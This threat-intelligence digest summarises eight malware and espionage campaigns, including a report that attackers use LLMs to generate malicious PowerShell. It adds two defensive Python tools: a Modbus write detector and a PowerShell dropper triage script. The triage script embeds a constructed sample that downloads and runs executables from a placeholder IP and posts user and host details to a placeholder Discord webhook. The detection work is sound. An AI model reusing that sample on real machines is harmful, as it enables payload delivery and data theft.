Source |
RiskIQ |
Identifier |
8546560 |
Publication date |
2024-07-29 10:58:35 (viewed: 2024-07-29 11:18:40) |
Title |
Weekly OSINT Highlights, 29 July 2024 |
Text |
## Snapshot
Key trends from last week's OSINT reporting include novel malware such as Flame Stealer and FrostyGoop, the abuse of legitimate platforms like Discord and GitHub for distribution and command and control, and state-sponsored actors conducting espionage and destructive attacks. Notable threat actors, including Russian groups, Transparent Tribe, FIN7, and DPRK's Andariel, are targeting sectors ranging from defense and industrial control systems to financial institutions and research entities. These attacks exploit a range of vulnerabilities and employ advanced evasion techniques, combining traditional methods with emerging ones such as AI-generated scripts and registered domain generation algorithms (RDGAs), underscoring the evolving and persistent nature of the threat landscape.
## Description
1. [Widespread Adoption of Flame Stealer](https://sip.security.microsoft.com/intel-explorer/articles/f610f18e): Cyfirma reports Flame Stealer being used to steal Discord tokens and browser credentials. Distributed via Discord and Telegram, the malware targets multiple platforms, uses DLL side-loading to evade detection, and exfiltrates stolen data through Discord webhooks.
2. [ExelaStealer Delivered via PowerShell](https://sip.security.microsoft.com/intel-explorer/articles/5b4a34b0): The SANS Technology Institute Internet Storm Center reported ExelaStealer being downloaded from a Russian IP address by a PowerShell script. The script fetches two PE files: a self-extracting RAR archive that communicates with "solararbx[.]online", and "service.exe", the ExelaStealer payload. ExelaStealer, written in Python, uses Discord for C2 and performs reconnaissance, gathering system and user details. Russian-language comments in the script and the origin of the IP address point to a Russian-speaking operator.
3. [FrostyGoop Disrupts Heating in Ukraine](https://sip.security.microsoft.com/intel-explorer/articles/cf8f8199): Dragos identified FrostyGoop malware in a cyberattack that disrupted heating in Lviv, Ukraine. Linked to Russian groups, the ICS-specific malware does not rely on a software flaw in the controllers themselves; it speaks the Modbus TCP protocol directly to industrial control devices, reading and modifying their register values.
4. [Rhysida Ransomware Attack on Private School](https://sip.security.microsoft.com/intel-explorer/articles/4cf89ad3): ThreatDown by Malwarebytes identified a Rhysida ransomware attack that used a new variant of the Oyster backdoor. The attackers used SEO-poisoned search results to lure victims to malicious installers posing as legitimate software, which deployed the Oyster backdoor.
5. [LLMs Used to Generate Malicious Code](https://sip.security.microsoft.com/intel-explorer/articles/96b66de0): Symantec highlights attacks that use Large Language Models (LLMs) to generate malware code. Phishing campaigns use LLM-generated PowerShell scripts to download payloads such as Rhadamanthys and LokiBot, underscoring the need for detection that does not depend on recognising hand-written tooling.
6. [Stargazers Ghost Network Distributes Malware](https://sip.security.microsoft.com/intel-explorer/articles/62a3aa28): Check Point Research uncovered a network of GitHub accounts that distributes malware through phishing repositories. The Stargazer Goblin group's distribution-as-a-service (DaaS) operation leverages over 3,000 accounts to spread malware such as Atlantida Stealer and RedLine, targeting both general users and other threat actors.
7. [Crimson RAT Targets Indian Election Results](https://sip.security.microsoft.com/intel-explorer/articles/dfae4887): K7 Labs identified Crimson RAT malware delivered through documents disguised as "Indian Election Results." Transparent Tribe (APT36), believed to operate from Pakistan, targets Indian diplomatic and defense entities with macro-embedded documents to steal credentials.
8. [AsyncRAT Distributed via Weaponized eBooks](https://sip.security.microsoft.com/intel-explorer/articles/e84ee11d): ASEC discovered AsyncRAT malware distributed through weaponized eBooks. PowerShell scripts hidden within the eBooks launch the AsyncRAT payload, which uses obfuscation and anti-detection techniques before exfiltrating data. |
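Item 3 above describes malware that reaches controllers by speaking Modbus TCP directly. As an added example (not code from the original page, from Dragos, or from the malware itself), the Python below parses Modbus/TCP request frames and flags holding-register writes coming from any host outside an allow-list, which is the cheapest network-side check an ICS operator can run against that behaviour. The frames, IP addresses, and allow-list are constructed here for illustration.

```python
"""Modbus/TCP request parser and write-detector (added example, constructed data)."""
import struct

# Function codes for the holding-register operations an attacker abuses to alter a controller.
READ_HOLDING_REGISTERS = 0x03
WRITE_SINGLE_REGISTER = 0x06
WRITE_MULTIPLE_REGISTERS = 0x10
WRITE_CODES = {WRITE_SINGLE_REGISTER, WRITE_MULTIPLE_REGISTERS}


def parse_modbus_tcp(frame: bytes) -> dict:
    """Parse one Modbus/TCP request: 7-byte MBAP header followed by the PDU.

    MBAP = transaction id (2) | protocol id (2, always 0) | length (2) | unit id (1);
    `length` counts the unit id plus every PDU byte. Malformed frames raise ValueError
    so the caller can treat them as suspicious rather than silently skipping them.
    """
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header and function code")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError(f"protocol id {proto} is not Modbus")
    if length != len(frame) - 6:
        raise ValueError("MBAP length field does not match frame size")
    fc = frame[7]
    pdu = frame[8:]
    req = {"tid": tid, "unit": unit, "fc": fc}
    if fc in (READ_HOLDING_REGISTERS, WRITE_SINGLE_REGISTER):
        addr, word = struct.unpack(">HH", pdu[:4])
        req["address"] = addr
        req["quantity" if fc == READ_HOLDING_REGISTERS else "value"] = word
    elif fc == WRITE_MULTIPLE_REGISTERS:
        addr, qty, nbytes = struct.unpack(">HHB", pdu[:5])
        if nbytes != 2 * qty or len(pdu) != 5 + nbytes:
            raise ValueError("write-multiple byte count inconsistent with quantity")
        req["address"] = addr
        req["values"] = list(struct.unpack(f">{qty}H", pdu[5:]))
    return req


def build_request(tid: int, unit: int, fc: int, body: bytes) -> bytes:
    """Assemble a request frame; used here only to construct sample traffic."""
    pdu = bytes([fc]) + body
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


def flag_unauthorized_writes(events, allowed_writers: set) -> list:
    """events: iterable of (src_ip, dst_ip, frame). Returns one alert per register
    write from a source not in allowed_writers, plus one per malformed frame."""
    alerts = []
    for src, dst, frame in events:
        try:
            req = parse_modbus_tcp(frame)
        except ValueError as exc:
            alerts.append({"src": src, "dst": dst, "reason": f"malformed frame: {exc}"})
            continue
        if req["fc"] in WRITE_CODES and src not in allowed_writers:
            alerts.append({"src": src, "dst": dst, "request": req,
                           "reason": f"register write fc={req['fc']:#04x} at address {req['address']}"})
    return alerts


# Constructed sample traffic: 10.0.0.5 is the legitimate HMI, 192.0.2.10 is an unexpected host.
ALLOWED_WRITERS = {"10.0.0.5"}
SAMPLE_EVENTS = [
    ("10.0.0.5", "10.0.1.20", build_request(1, 1, READ_HOLDING_REGISTERS, struct.pack(">HH", 0, 10))),
    ("10.0.0.5", "10.0.1.20", build_request(2, 1, WRITE_SINGLE_REGISTER, struct.pack(">HH", 40, 550))),
    ("192.0.2.10", "10.0.1.20", build_request(3, 1, WRITE_SINGLE_REGISTER, struct.pack(">HH", 40, 0))),
    ("192.0.2.10", "10.0.1.20", build_request(4, 1, WRITE_MULTIPLE_REGISTERS,
                                              struct.pack(">HHB", 100, 2, 4) + struct.pack(">2H", 0, 0))),
    ("192.0.2.10", "10.0.1.20", b"\x00\x05\x00\x00\x00\x06\x01\x06\x00\x28"),  # truncated write
]

if __name__ == "__main__":
    for alert in flag_unauthorized_writes(SAMPLE_EVENTS, ALLOWED_WRITERS):
        print(alert["src"], "->", alert["dst"], alert["reason"])
```

The allow-list is deliberately the whole policy: in a plant network the set of hosts that may write to a controller is small and static, so any write from outside it is worth an alert even before anyone looks at the values written. Malformed frames are reported rather than dropped because a parser that fails open is exactly what a scanner or a buggy implant would exploit.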
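Items 2, 5 and 8 all turn on a PowerShell script that downloads and launches a payload, and items 1 and 2 describe Discord webhooks and Discord-based C2 as the exfiltration channel. The Python triage helper below is an added example, not code from the original reporting or from any of the vendors cited; it pulls those indicators (download cradles, payload launches, URLs, Discord webhook endpoints, and non-Latin comments) out of script text and weights them into a score. The regexes, the weights, and the sample script with its placeholder IP and webhook are all constructed assumptions, not observed indicators.

```python
"""PowerShell dropper triage (added example; heuristics and sample script are constructed)."""
import re

# Download cradles and execution primitives common to PowerShell droppers (assumed list).
CRADLE_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadFile|DownloadString|Start-BitsTransfer|\bcurl\b",
    re.I,
)
EXEC_RE = re.compile(r"Start-Process|Invoke-Expression|\biex\b|\.exe\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
# Discord webhook endpoint: the id/token pair is what the exfiltration channel depends on.
WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([A-Za-z0-9_-]+)"
)
COMMENT_RE = re.compile(r"#(.*)$", re.M)      # line comments only; <# ... #> blocks are not handled
CYRILLIC_RE = re.compile(r"[\u0400-\u04FF]")  # the Russian-language comments item 2 mentions


def triage_powershell(script: str) -> dict:
    """Extract indicators from (already de-obfuscated) script text.

    A dropper is recognised by a download cradle, a payload launch, and where it
    phones home; comment language is a weak attribution hint, not evidence on its own.
    """
    comments = COMMENT_RE.findall(script)
    return {
        "download_cradle": bool(CRADLE_RE.search(script)),
        "executes_payload": bool(EXEC_RE.search(script)),
        "urls": URL_RE.findall(script),
        "discord_webhooks": [
            {"id": m.group(1), "token_prefix": m.group(2)[:6] + "..."}  # never log the full token
            for m in WEBHOOK_RE.finditer(script)
        ],
        "cyrillic_comments": [c.strip() for c in comments if CYRILLIC_RE.search(c)],
    }


def risk_score(findings: dict) -> int:
    """Weighted sum (assumed weights); cradle + launch + Discord webhook scores highest."""
    score = 0
    score += 2 if findings["download_cradle"] else 0
    score += 2 if findings["executes_payload"] else 0
    score += 3 if findings["discord_webhooks"] else 0
    score += 1 if findings["cyrillic_comments"] else 0
    return score


# Constructed sample modelled on the item 2 description; the IP and webhook are placeholders.
SAMPLE_SCRIPT = r"""
# Загрузка и запуск
$u1 = "http://203.0.113.7/files/archive.exe"
$u2 = "http://203.0.113.7/files/service.exe"
Invoke-WebRequest -Uri $u1 -OutFile "$env:TEMP\archive.exe"
Invoke-WebRequest -Uri $u2 -OutFile "$env:TEMP\service.exe"
Start-Process "$env:TEMP\service.exe"
$info = "$env:USERNAME@$env:COMPUTERNAME"
Invoke-RestMethod -Method Post -Uri "https://discord.com/api/webhooks/1234567890/abcdefGHIJKLmnop" -Body @{content=$info}
"""

# Constructed benign script for contrast.
BENIGN_SCRIPT = "Get-ChildItem -Path C:\\Logs -Filter *.log | Measure-Object\n"

if __name__ == "__main__":
    findings = triage_powershell(SAMPLE_SCRIPT)
    print("score", risk_score(findings), "webhooks", findings["discord_webhooks"])
```

Run it over scripts recovered from mail attachments, eBook containers, or decoded `-EncodedCommand` arguments; the webhook id is the indicator to hand to Discord for takedown, and the token is deliberately truncated so the triage output itself does not become a copy of the attacker's credential.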
Notes |
★★
|
Sent |
Yes |
Tags |
Ransomware
Data Breach
Spam
Malware
Tool
Vulnerability
Threat
Legislation
Mobile
Industrial
Medical
|
Stories |
APT 28
APT 36
|